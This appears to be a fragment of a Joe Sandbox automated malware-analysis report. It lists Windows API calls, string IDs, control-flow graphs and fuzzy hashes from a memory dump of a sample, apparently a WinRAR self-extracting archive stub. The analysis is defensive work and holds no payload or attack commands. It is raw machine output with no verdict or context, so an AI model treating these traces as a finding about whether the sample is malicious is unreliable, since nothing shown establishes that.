                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,008B3C7C,00000000), ref: 00890BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00890C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00890C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,008B3C7C,?,00000000,?,00000800), ref: 00890C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,008B3C7C,00000800,?,00000000,?,00000800), ref: 00890C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,008B3D44,00000800), ref: 00890CD8
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • _swprintf.LIBCMT ref: 00890D4A
                                                              • _swprintf.LIBCMT ref: 00890D96
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • AllocConsole.KERNEL32 ref: 00890D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00890DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00890DAF
                                                              • _wcslen.LIBCMT ref: 00890DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00890DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00890DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00890DE7
                                                              • FreeConsole.KERNEL32 ref: 00890DED
                                                              • ExitProcess.KERNEL32 ref: 00890DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
                                                              • Instruction ID: 43abcc0e90a5a5ec2c779b9d865dabcca2f493307cf0f79b5ad31588c8a9a0e8
                                                              • Opcode Fuzzy Hash: f32a21571c791f9c10849fae342df0559a27052dcaaa8949c7c0bb384d995d78
                                                              • Instruction Fuzzy Hash: 55D17DB1448784AFD721AF948849ADFBBE8FF84308F54091DF285D6351CBB0964DCB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089C744
                                                                • Part of subcall function 0089B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0089B3FB
                                                              • _wcslen.LIBCMT ref: 0089CA0A
                                                              • _wcslen.LIBCMT ref: 0089CA13
                                                              • SetWindowTextW.USER32(?,?), ref: 0089CA71
                                                              • _wcslen.LIBCMT ref: 0089CAB3
                                                              • _wcsrchr.LIBVCRUNTIME ref: 0089CBFB
                                                              • GetDlgItem.USER32(?,00000066), ref: 0089CC36
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0089CC46
                                                              • SendMessageW.USER32(00000000,00000143,00000000,008CA472), ref: 0089CC54
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0089CC7F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 2804936435-312220925
                                                              • Opcode ID: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
                                                              • Instruction ID: 44f7172fe89a642ddcba0740c0acbf24fd13b6e9cdde8e3dc3890e77c25cf4e3
                                                              • Opcode Fuzzy Hash: 1ba9d8eb09eb08db16d25ab83bba740955aceb3bae4b555affe132c3f286afb1
                                                              • Instruction Fuzzy Hash: 7BE151B2900218AADF25EBA4DD85EEE77BCFB05310F4441A6F609E7141EB749F848B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0088DA70
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0088DAAC
                                                                • Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                                • Part of subcall function 00891B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0088BAE9,00000000,?,?,?,0001042C), ref: 00891BA0
                                                              • _wcslen.LIBCMT ref: 0088DDE9
                                                              • __fprintf_l.LIBCMT ref: 0088DF1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                              • API String ID: 566448164-801612888
                                                              • Opcode ID: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
                                                              • Instruction ID: f9554537217c20934b71a38231cf99721500bdfef9a77883f20eb403fa622fb8
                                                              • Opcode Fuzzy Hash: 3c643bb06e209d48a945d5614e4a986e0ca4b6e425b2478c3be7c3ec6d278b17
                                                              • Instruction Fuzzy Hash: 7C32ED71900218EBDF24FF68C845AEE77A9FF15304F44056AF906EB281EBB1AD84CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              • GetDlgItem.USER32(00000068,008DFCB8), ref: 0089D4E8
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,0089AF07,00000001,?,?,0089B7B9,008B506C,008DFCB8,008DFCB8,00001000,00000000,00000000), ref: 0089D510
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0089D51B
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B35F4), ref: 0089D529
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D53F
                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0089D559
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D59D
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0089D5AB
                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0089D5BA
                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0089D5E1
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,008B43F4), ref: 0089D5F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                              • String ID: \
                                                              • API String ID: 3569833718-2967466578
                                                              • Opcode ID: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
                                                              • Instruction ID: 51e80281ade20679186bd4edb9d205ebdbe0f7660ba587846006fd8630703bbf
                                                              • Opcode Fuzzy Hash: 7fa372499b275f112bdaf6d63348f8c0a4e6235f02f6bfce28d8a4fca174a29e
                                                              • Instruction Fuzzy Hash: 0431AF71149782ABE301EF249C8EFAB7FACFB86704F040518F551DB2A1DB759A04877A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0089D7AE
                                                              • ShellExecuteExW.SHELL32(?), ref: 0089D8DE
                                                              • ShowWindow.USER32(?,00000000), ref: 0089D91D
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0089D959
                                                              • CloseHandle.KERNEL32(?), ref: 0089D97F
                                                              • ShowWindow.USER32(?,00000001), ref: 0089D9E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                              • String ID: .exe$.inf
                                                              • API String ID: 36480843-3750412487
                                                              • Opcode ID: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
                                                              • Instruction ID: 30dd999fced553497647bd4819765de03a295584cb31deb68078db43a410ba05
                                                              • Opcode Fuzzy Hash: 6e42f3466be23ee0891d49a44d79ee2b702e9fb74b88997102a349f0da6a8ffd
                                                              • Instruction Fuzzy Hash: C451B2715083849ADF31BB249844BABBBE4FF85744F0C082EF9C5E7292E7718945CB5A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,008A5695,008A5695,?,?,?,008AABAC,00000001,00000001,2DE85006), ref: 008AA9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008AABAC,00000001,00000001,2DE85006,?,?,?), ref: 008AAA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008AAB35
                                                              • __freea.LIBCMT ref: 008AAB42
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • __freea.LIBCMT ref: 008AAB4B
                                                              • __freea.LIBCMT ref: 008AAB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
                                                              • Instruction ID: 925585ad00a39d102fedd9250b3750a21f80e19b1b1e26af194e8c76d52b3c31
                                                              • Opcode Fuzzy Hash: 19dc83eb77cf9beffcd51bfbb4ed011f9f8d4ce7fa1ef560c6f5e72a66dbabc7
                                                              • Instruction Fuzzy Hash: 6C51C372600216AFFB298E64CC41EBBB7AAFB46760F154628FC14D6950DB34DC51C6A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,008A3C35,?,?,008E2088,00000000,?,008A3D60,00000004,InitializeCriticalSectionEx,008B6394,InitializeCriticalSectionEx,00000000), ref: 008A3C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
                                                              • Instruction ID: 4dff13c717faa2ff4d1f4a1153e5eca4b615b1a2c2ffb08256f299ffc12afcf5
                                                              • Opcode Fuzzy Hash: 9fb114c6e746ee8b83463fde2fa08f75d09958173846157ce8cb90582d11d610
                                                              • Instruction Fuzzy Hash: AD11C232A45625ABEF228B689C41B5A37A5FF03770F250220F955FB6D0E774EF0186E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0089ABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0089ABF9
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0089ABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
                                                              • Instruction ID: 096f9ba387c748e8a9c790f76da9ee27dbccc5129c50eeb6a524068500326938
                                                              • Opcode Fuzzy Hash: ac33a1a7dbf7e08ef2f30fe382217a58d9f7a3896e057c9905d9354866ef2bee
                                                              • Instruction Fuzzy Hash: D5F0E23270062976DF20B6659C09FEB726CFB82B10F4C0021BA44E7180DB60EE4185F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • OleInitialize.OLE32(00000000), ref: 0089AC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0089AC66
                                                              • SHGetMalloc.SHELL32(008C8438), ref: 0089AC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll$3So
                                                              • API String ID: 3498096277-3464455743
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 1007 8898e0-889901 call 89ec50 1010 88990c 1007->1010 1011 889903-889906 1007->1011 1013 88990e-88991f 1010->1013 1011->1010 1012 889908-88990a 1011->1012 1012->1013 1014 889921 1013->1014 1015 889927-889931 1013->1015 1014->1015 1016 889933 1015->1016 1017 889936-889943 call 886edb 1015->1017 1016->1017 1020 88994b-88996a CreateFileW 1017->1020 1021 889945 1017->1021 1022 8899bb-8899bf 1020->1022 1023 88996c-88998e GetLastError call 88bb03 1020->1023 1021->1020 1025 8899c3-8899c6 1022->1025 1027 8899c8-8899cd 1023->1027 1029 889990-8899b3 CreateFileW GetLastError 1023->1029 1025->1027 1028 8899d9-8899de 1025->1028 1027->1028 1030 8899cf 1027->1030 1031 8899ff-889a10 1028->1031 1032 8899e0-8899e3 1028->1032 1029->1025 1036 8899b5-8899b9 1029->1036 1030->1028 1034 889a2e-889a39 1031->1034 1035 889a12-889a2a call 890602 1031->1035 1032->1031 1033 8899e5-8899f9 SetFileTime 1032->1033 1033->1031 1035->1034 1036->1025
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00887760,?,00000005,?,00000011), ref: 0088995F
                                                              • GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0088996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00887760,?,00000005,?), ref: 008899A2
                                                              • GetLastError.KERNEL32(?,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00887760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008899F9
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 1066 89b568-89b581 PeekMessageW 1067 89b5bc-89b5be 1066->1067 1068 89b583-89b597 GetMessageW 1066->1068 1069 89b599-89b5a6 IsDialogMessageW 1068->1069 1070 89b5a8-89b5b6 TranslateMessage DispatchMessageW 1068->1070 1069->1067 1069->1070 1070->1067
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                              • IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                              • TranslateMessage.USER32(?), ref: 0089B5AC
                                                              • DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 1071 89dbde-89dc12 call 89ec50 SetEnvironmentVariableW call 890371 1076 89dc14-89dc18 1071->1076 1077 89dc36-89dc38 1071->1077 1078 89dc21-89dc28 call 89048d 1076->1078 1081 89dc1a-89dc20 1078->1081 1082 89dc2a-89dc30 SetEnvironmentVariableW 1078->1082 1081->1078 1082->1077
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0089DBF4
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0089DC30
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 1083 889785-889791 1084 88979e-8897b5 ReadFile 1083->1084 1085 889793-88979b GetStdHandle 1083->1085 1086 889811 1084->1086 1087 8897b7-8897c0 call 8898bc 1084->1087 1085->1084 1088 889814-889817 1086->1088 1091 8897d9-8897dd 1087->1091 1092 8897c2-8897ca 1087->1092 1094 8897ee-8897f2 1091->1094 1095 8897df-8897e8 GetLastError 1091->1095 1092->1091 1093 8897cc 1092->1093 1098 8897cd-8897d7 call 889785 1093->1098 1096 88980c-88980f 1094->1096 1097 8897f4-8897fc 1094->1097 1095->1094 1099 8897ea-8897ec 1095->1099 1096->1088 1097->1096 1100 8897fe-889807 GetLastError 1097->1100 1098->1088 1099->1088 1100->1096 1102 889809-88980a 1100->1102 1102->1098
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00889795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008897AD
                                                              • GetLastError.KERNEL32 ref: 008897DF
                                                              • GetLastError.KERNEL32 ref: 008897FE
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0088D710,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue), ref: 008AAD66
                                                              • GetLastError.KERNEL32(?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000,00000364,?,008A98B7), ref: 008AAD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008AACDB,0088D710,00000000,00000000,00000000,?,008AAED8,00000006,FlsSetValue,008B7970,FlsSetValue,00000000), ref: 008AAD80
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0088D343,00000001,?,?,?,00000000,0089551D,?,?,?), ref: 00889F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0089551D,?,?,?,?,?,00894FC7,?), ref: 00889FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0088D343,00000001,?,?), ref: 0088A011
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088C27E: _wcslen.LIBCMT ref: 0088C284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A30C
                                                              • GetLastError.KERNEL32(?,?,?,?,0088A175,?,00000001,00000000,?,?), ref: 0088A329
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008AB8B8
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 008AAFDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
